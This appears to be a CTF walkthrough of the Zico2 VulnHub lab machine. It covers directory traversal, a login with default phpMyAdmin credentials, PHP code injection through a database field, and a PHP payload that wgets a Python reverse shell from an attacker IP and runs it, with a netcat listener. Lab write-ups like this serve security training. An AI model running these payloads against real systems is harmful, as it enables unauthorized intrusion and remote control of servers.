We covered the first part of Zico2 VulnHub CTF Walkthrough where we demonstrated command injection in an old version of PhpMyAdmin database that allowed us to execute remote system commands.
Vulnerability Discovery and Exploitation
1. Network Scanning: I started by using nmap to discover the target machine’s IP address and open ports. The exact nmap command wasn’t fully shown, but it included several switches. The scan quickly revealed an HTTP service running.
2. Directory Traversal Vulnerability: I then identified a parameter named page in a URL (for example, tools.html?page=). This page parameter was found to be vulnerable to directory traversal. By manipulating the parameter, I was able to access files outside the web root, specifically the /etc/passwd file. The request was sent to a tool like Burp Suite’s Repeater to test the traversal.
3. Discovering phpMyAdmin: I used dirb (or a similar tool like dirbuster) to find directories on the web server. This scan revealed a directory named dbadmin. Accessing /dbadmin redirected me to a phpMyAdmin login page.
4. phpMyAdmin Login: I tried common default credentials for phpMyAdmin, and using “admin” for both username and password resulted in a successful login!
5. Identifying phpMyAdmin Vulnerability: Once logged in, I checked the version of the installed phpMyAdmin, which was identified as 1.3. Using a tool like searchsploit (or by searching online exploit databases), I found that this version of phpMyAdmin is vulnerable to remote code execution (RCE) or remote PHP code injection.
6. Exploiting RCE via Database Manipulation: The core idea here was to create a new database and a table within it. A field in this table would store PHP code. Then, by using the previously discovered directory traversal vulnerability, I could access the raw database file containing this PHP code, which would cause the server to execute it.
7. Initial Code Execution Test: I created a new database (e.g., “test”) and a new table (e.g., “test1”) with one field. The field type was set to TEXT to accommodate the PHP code. I inserted simple PHP code to execute a system command, like this:
PHP
<?php system('ls'); ?>
I then used the directory traversal vulnerability to access the path of this newly created database file (for example, ../../../../../../../../var/lib/mysql/test/test1.php). Accessing this path successfully executed the ls command, confirming RCE.
8. Crafting a Reverse Shell Payload: My next goal was to get a reverse shell on the target machine. I decided to use a Python reverse shell. I crafted a new PHP payload to:
- Change directory to
/tmp(cd /tmp). - Download the Python reverse shell script from my attacking machine using
wget(e.g.,wget http://<attacker_IP>/shell.py -O shell.py). The filename I saw used in the video wasfinal2.pyand laterfinal3.py. - Make the Python script executable (
chmod +x shell.py). - Execute the Python reverse shell (
python shell.py).
The full PHP command sequence inserted into the database field looked something like this (adjusting for filenames and IPs):
PHP
<?php system('cd /tmp; wget http://<attacker_IP>/final3.py -O final3.py; chmod +x final3.py; python final3.py'); ?>
9. Setting up a Listener: On my attacking machine, I set up a netcat listener to receive the incoming reverse shell connection (e.g., nc -lvnp <port>). This step was implied but the exact command wasn’t explicitly shown.
10. Triggering the Reverse Shell: I then used the directory traversal vulnerability again to access the database file containing the new PHP payload. This executed the commands, downloaded the Python script, and ran it. A connection was successfully established back to my netcat listener.
11. Gaining Shell Access: I successfully gained a shell on the Zico2 machine! I ran commands like whoami and ls on the compromised machine to confirm my access.
Next Steps
The video concluded by stating that the next step, privilege escalation to gain root access, would be covered in a subsequent video.
This entire process gave me a thorough understanding of the techniques and commands used to compromise the Zico2 machine.
